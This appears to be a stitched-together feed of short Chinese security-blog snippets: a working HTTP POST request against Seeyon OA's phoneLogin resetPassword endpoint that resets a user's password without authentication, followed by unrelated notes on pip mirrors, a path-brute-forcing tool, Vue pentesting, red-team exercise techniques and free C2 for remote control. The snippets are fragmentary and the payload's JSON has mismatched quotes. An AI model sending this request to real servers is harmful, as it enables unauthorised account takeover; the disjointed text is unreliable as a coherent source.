我实在没想到,2023年居然还有这种漏洞的存在...我啥时候也能挖掘这么个漏洞出来哇...
POST /seeyon/rest/phoneLogin/phoneCode/resetPassword HTTP/1.1
Host: ip:port
User-Agent: Go-http-client/1.1
Content-Length: 24
Content-Type: application/json
Accept-Encoding: gzip
{"loginName":"XXX321123XXX”,”password":"123456"}
有时候我们国内pip3 install xxx
会非常卡,这个时候就可以使用-i
参数去指定pip
源。这里收集了几个不错的,以后直接来这个帖子里复制粘贴就完事了 1.清华源https://pypi.tuna.tsinghua.edu.cn/simple
2.阿里云https://mirrors.aliyun.com/pypi/simple/
不知道是不是0day
,反正先发出来吧。工具很好,存在一个目录列表,不停地尝试网站路径
点击下载
这种前后端分离的站确实是打得少,这里备份一个文章,简单的讲解了一下Vue下的渗透测试
这篇文章很不错的总结了今年护网所用的一些技术、手法等。 我感觉今年护网已经有点WPS攻防战
的感觉了,不像是对各家公司做测试,更像是WPS挖洞大赛。 最后针对文中的提到的免费C2
或者说是签名C2
,网上有人总结好了云上远控